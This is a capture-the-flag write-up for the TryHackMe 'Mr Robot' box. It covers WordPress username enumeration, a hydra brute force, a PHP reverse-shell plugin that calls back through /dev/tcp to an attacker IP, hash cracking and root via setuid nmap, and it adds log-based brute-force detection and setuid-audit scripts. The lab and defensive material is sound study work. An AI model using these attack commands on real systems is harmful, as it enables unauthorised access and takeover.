{THM} Mr Robot
Last updated
Based on the Mr. Robot show, can you root this box?
Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?
Credit to Leon Johnson for creating this machine. This machine is used here with the explicit permission of the creator <3
I started with a normal nmap scan and a gobuster run (slooooww), but the connection to the box was so bad that I added it to my hosts file so the connectivity issue would hurt less. Append with >> rather than >, so the existing entries in /etc/hosts are kept:
echo "<MACHINE_IP> mrrobot.thm" >> /etc/hosts
Let's proceed with directory scanning.
gobuster dir -u http://<THM_MACHINE> -w <path_to_wordlist>
Yeahhh, we found some good information. This machine runs WordPress and it has a robots.txt. Let's open it and see what robots.txt holds.
It shows 2 entries. One of them is our first flag. When we navigate to fsocity.dic it automatically downloads a file, and the file contains a list of words.
At a glance I assume this is a list of passwords and usernames.
Since this is WordPress, let's try to log in at /wp-login.php.
Let's try some default credentials: admin:admin, admin:password. We notice the error message says the username is incorrect. That is a hint: the login page tells us whether the username exists. Earlier, in the downloaded file, we noticed some names, so I tried likely ones such as robot, Robot and Elliot. Boom, we got a username.
For the password, I use hydra to brute-force it.
hydra -l Elliot -P fsocity.dic <machine> http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for the username"
Hydra successfully found Elliot's valid password: ER28-0652.
Alternative:
wpscan --url THM_MACHINE --wp-content-dir wp-admin --usernames elliot --passwords fsocity-sorted.dic
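Both hydra and wpscan send one POST to wp-login.php per guess, so from the server side the attack looks like a single client producing a burst of login POSTs. The script below is an added example, not part of the original writeup: it runs over a constructed access log (IPs and timestamps are made up) and reports clients whose POST count to wp-login.php reaches a threshold, which is the check a defender would put in a log review or a fail2ban-style rule.

```shell
#!/bin/sh
# Added example, not part of the original writeup: spot a login brute force
# against wp-login.php from web server access logs. Hydra and wpscan send one
# POST per guess, so a single client producing a burst of POSTs to the login
# page is the signal to look for.

# Constructed sample log (Common Log Format); IPs and times are made up.
LOG="${TMPDIR:-/tmp}/wp_access_sample.$$.log"
cat > "$LOG" <<'EOF'
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /robots.txt HTTP/1.1" 200 41
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /wp-login.php HTTP/1.1" 200 2811
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3451
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3451
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3451
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 3451
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 3451
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 302 0
10.0.0.9 - - [01/Jan/2024:10:05:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0
10.0.0.9 - - [01/Jan/2024:10:05:01 +0000] "GET /wp-admin/ HTTP/1.1" 200 9811
EOF

# count_login_posts <logfile>: "count ip" for each client that POSTed to
# wp-login.php, busiest first. In CLF, $6 is the quoted method and $7 the path.
count_login_posts() {
  awk '$6 == "\"POST" && $7 ~ /^\/wp-login\.php/ { n[$1]++ }
       END { for (ip in n) print n[ip], ip }' "$1" | sort -rn
}

# flag_bruteforce <logfile> <threshold>: IPs whose POST count reaches the threshold.
flag_bruteforce() {
  count_login_posts "$1" | awk -v t="$2" '$1 >= t { print $2 }'
}

# Stand-alone run: list clients with 5 or more login POSTs (prints 10.0.0.5).
flag_bruteforce "$LOG" 5
```

The threshold is the only tuning knob; a real WordPress admin logs in a handful of times a day, so anything in the dozens per minute from one address is worth an alert. Counting only POSTs that returned 200 (the "incorrect password" page) rather than 302 (a successful login) would cut false positives further.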
Next we log in to WordPress with the credentials we got.
As we can see, it can be exploited in 2 ways:
By using the 404 template
Uploading a fake plugin (I use this)
To do so, go to Plugins and Add New.
Next we upload our reverse shell.
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP_MACHINE/PORT 0>&1'"); ?>
Before uploading the shell, make sure to save it as a zip file, since the uploader only accepts .zip files.
After that, open a listening port:
nc -lnvp port
As we know, we start from /home. We know the user is robot and the flag is inside. Before that, make a stable connection.
But we cannot read this file due to permission denied. So let's look at the other file we found in the home directory.
We can see it is in the format username:password (hash).
Let's crack it.
Identify the hash: echo "puthash" | hash-identifier
Crack it using hashcat or CrackStation (online).
We got the cracked password. Let's try it with the username robot.
Now we can see our flag.
Let's move on to root. Unfortunately, we cannot run sudo, so let's use another way to find anything vulnerable on this machine.
find / -perm -u=s -type f 2>/dev/null
When I cannot run sudo, this is the method I use.
It shows this machine has a setuid nmap. Let's find out how to escalate with it (GTFOBins).
nmap --interactive, then !sh at the nmap> prompt
We are in as root, as easy as that.
Now let's find our flag. And that is it for Mr ROBOT.
Always update nmap, since the latest versions no longer allow interactive mode. Other than that, make sure sudo and administrator use are configured properly.
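The same find command that hands an attacker the setuid list is the defender's audit tool: keep a baseline of the setuid binaries a host is supposed to have and report anything that is not on it, so a stray setuid nmap (or anything else) shows up before someone else finds it. The script below is an added example, not the writeup's own code; -perm -4000 is the numeric form of the -perm -u=s used above, and the demo directory tree and baseline file are constructed so the script runs without touching the real system.

```shell
#!/bin/sh
# Added example, not from the writeup: audit setuid binaries against a baseline
# of the ones a host is expected to have, and report anything else. The demo
# tree and baseline below are constructed for the example.

# list_suid <root>: setuid regular files under <root>, relative to <root>, sorted.
list_suid() {
  find "$1" -perm -4000 -type f 2>/dev/null | sed "s|^$1/||" | sort
}

# audit_suid <root> <baseline>: setuid files that are not listed in <baseline>
# (one relative path per line). Prints nothing when the host matches the baseline.
audit_suid() {
  list_suid "$1" | grep -vxF -f "$2" || true
}

# Constructed demo tree: three setuid files, one of them (nmap) not in the baseline.
DEMO="${TMPDIR:-/tmp}/suid_audit_demo.$$"
mkdir -p "$DEMO/bin" "$DEMO/usr/bin"
for f in bin/su usr/bin/passwd usr/bin/nmap; do
  : > "$DEMO/$f"
  chmod 4755 "$DEMO/$f"
done
: > "$DEMO/usr/bin/vim"
chmod 0755 "$DEMO/usr/bin/vim"      # not setuid, must not be reported
printf 'bin/su\nusr/bin/passwd\n' > "$DEMO/baseline.txt"

# Stand-alone run: prints usr/bin/nmap
audit_suid "$DEMO" "$DEMO/baseline.txt"
```

On a real host, run list_suid / against a freshly built image to produce the baseline, store it outside the host, and run audit_suid from a cron job or your config management; any new line is either a package upgrade you can explain or something to investigate.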